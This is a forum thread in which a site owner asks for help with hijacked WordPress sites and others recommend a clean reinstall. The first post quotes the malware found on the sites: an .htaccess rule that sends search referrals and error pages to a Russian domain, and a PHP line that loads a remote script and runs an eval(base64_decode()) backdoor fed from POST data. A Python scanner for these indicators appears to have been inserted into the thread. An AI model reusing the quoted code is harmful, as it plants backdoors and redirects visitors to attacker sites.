Thread ID: 122699 2012-01-08 00:07:00 Hijacked wordpress site Chilling_Silence (9) Press F1
Post ID Timestamp Content User
1252816 2012-01-08 00:07:00 Hi all,

Got a problem with a couple of wordpress sites. For some reason when visiting them via a search engine, we're being redirected to a rogue site.
I've found this in the .htaccess:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ byidget.ru [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ byidget.ru [R=301,L]
</IfModule>

ErrorDocument 400 byidget.ru
ErrorDocument 401 byidget.ru
ErrorDocument 403 byidget.ru
ErrorDocument 404 byidget.ru
ErrorDocument 500 byidget.ru

However, for some reason when I visit the site I'm still being redirected. I've done a bit of a check and I also found this:

cat wordpress/wp-blog-header.php
<?php
// global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "turnitupnow.net($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43), $_POST[$sessdt_p])));exit;} }

/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
Looks like something's not quite right (so I commented that first line out), but I'm not entirely sure where else to go. Is it worth going for a reinstallation of wordpress and just pulling the db across?

Any ideas?

Thanks


Chill.
Chilling_Silence (9)
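A small scanner for the two indicators shown in this post, added here as example code (not from the thread or from WordPress): the referer-gated RewriteCond/RewriteRule pair and the offsite ErrorDocument targets in .htaccess, and the request-fed eval(base64_decode()) plus the cookie-gated script/meta-refresh injected into wp-blog-header.php. Both samples are constructed and trimmed from what the post quotes, and own_hosts is an assumed parameter naming the site's own hostnames.

```python
import re
# Constructed samples mirroring the thread's two artifacts (referer list trimmed).
SAMPLE_HTACCESS = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook|twitter)\\.(.*)
RewriteRule ^(.*)$ byidget.ru [R=301,L]
</IfModule>
ErrorDocument 404 byidget.ru
"""
SAMPLE_PHP = """<?php
if(!@$_COOKIE['lb11']){ @setcookie('lb11','102'); } else {
echo "<meta http-equiv='refresh' content='0;url=http://$j'><!--"; }
if(isset($_POST['showimg'])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST['showimg'])));exit;}
"""

REFERER_COND = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
REWRITE_RULE = re.compile(r"RewriteRule\s+\S+\s+(\S+)", re.I)
ERROR_DOC = re.compile(r"ErrorDocument\s+(\d{3})\s+(\S+)", re.I)
REQUEST_EVAL = re.compile(r"eval\s*\(\s*base64_decode\s*\(.*?\$_(POST|GET|COOKIE|REQUEST)", re.I | re.S)
COOKIE_REFRESH = re.compile(r"setcookie\s*\(.*?http-equiv=.refresh", re.I | re.S)

def is_offsite(target, own_hosts):
    """A redirect target is offsite when it names a host outside own_hosts (assumed set of the site's hostnames)."""
    host = re.sub(r"^https?://", "", target, flags=re.I).split("/")[0].lower()
    return "." in host and host not in own_hosts

def scan_htaccess(text, own_hosts=frozenset()):
    """Flag referer-gated redirects and error pages that send visitors to other hosts."""
    findings, lines = [], text.splitlines()
    for i, line in enumerate(lines):
        cond = REFERER_COND.search(line)
        if cond:  # the rule that fires on this condition normally follows within a few lines
            n = len(cond.group(1).split("|"))
            for nxt in lines[i + 1:i + 4]:
                rule = REWRITE_RULE.search(nxt)
                if rule and is_offsite(rule.group(1), own_hosts):
                    findings.append(f"referer-gated redirect ({n} referer patterns) to {rule.group(1)}")
                    break
        err = ERROR_DOC.search(line)
        if err and is_offsite(err.group(2), own_hosts):
            findings.append(f"ErrorDocument {err.group(1)} redirects offsite to {err.group(2)}")
    return findings

def scan_php(text):
    """Flag the two behaviours injected into wp-blog-header.php: request-fed eval and cookie-gated refresh."""
    findings = []
    if REQUEST_EVAL.search(text):
        findings.append("eval(base64_decode(...)) fed from request data: remote code execution backdoor")
    if COOKIE_REFRESH.search(text):
        findings.append("cookie-gated meta refresh: fires once per browser, then stays quiet")
    return findings
```

Run scan_htaccess and scan_php over every .htaccess and .php file under the document root, not just the WordPress directory; the cookie gate is why repeat visits from the same browser look clean, so verify from a fresh session.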
1252817 2012-01-08 00:30:00 If it was me:

1. A Wordpress install looks like a bowl of spaghetti.
2. The hacker knows it a hell of a lot better than me.

I would nuke it from orbit.
fred_fish (15241)
1252818 2012-01-08 00:37:00 Yeah was kinda figuring that would be the way to go :-/

Time for a re-install then I s'pose, wish me luck ;)
Chilling_Silence (9)
1252819 2012-01-08 04:52:00 Is the hijack with wordpress.com or wordpress.org?

LL
lakewoodlady (103)
1252820 2012-01-08 06:07:00 It's a couple of custom-hosted sites using the opensource wordpress :) Chilling_Silence (9)
1252821 2012-01-08 06:19:00 It's a couple of custom-hosted sites using the opensource wordpress :)

In that case, wordpress probably won't want to know. :(
lakewoodlady (103)
1252822 2012-01-08 06:22:00 I've seen something similar, and it was very difficult to remove (there is code hidden in various places that will re-infect what you've already cleaned up!!!). If you have a known good backup of both the db and the files, restore, otherwise you will want to reinstall. somebody (208)
1252823 2012-01-09 03:25:00 Turns out it's on most of my wordpress sites, on a couple of different hosts, using a variety of themes from different places (Some were standard themes) and some with different (Some with none) plugins.

Gonna be a *long* night methinks :(
Chilling_Silence (9)
1252824 2012-01-09 07:05:00 Ouch - good luck. somebody (208)
1252825 2012-01-09 08:18:00 OK so yeah long story short there was a shared-hosting user with two sites on it.
I fixed up Site A and got it all back up, nuked wordpress and started over, cleared *all* the .htaccess files that user account had access to, changed the ssh / ftp / website / mysql passwords, changed the auth keys / salts, and everything was looking fine. I was going to fix up the second site a short while after.

Took a break for dinner, came back and the .htaccess files were back again. The site's .php files hadn't been infected though thankfully, nor the database. This happened twice, until I cottoned on to what was happening. I removed the site entirely and it's been fine now for 4 hours (Previously it was infected within half an hour of being cleaned).

All this appears to have happened around the 4th, the day after the new Wordpress came out that apparently fixed the vulnerabilities, coz from what I can tell based on the plugins / themes in use across my different Wordpress sites, it wasn't any of them, but Wordpress itself.
Lucky me ...
Chilling_Silence (9)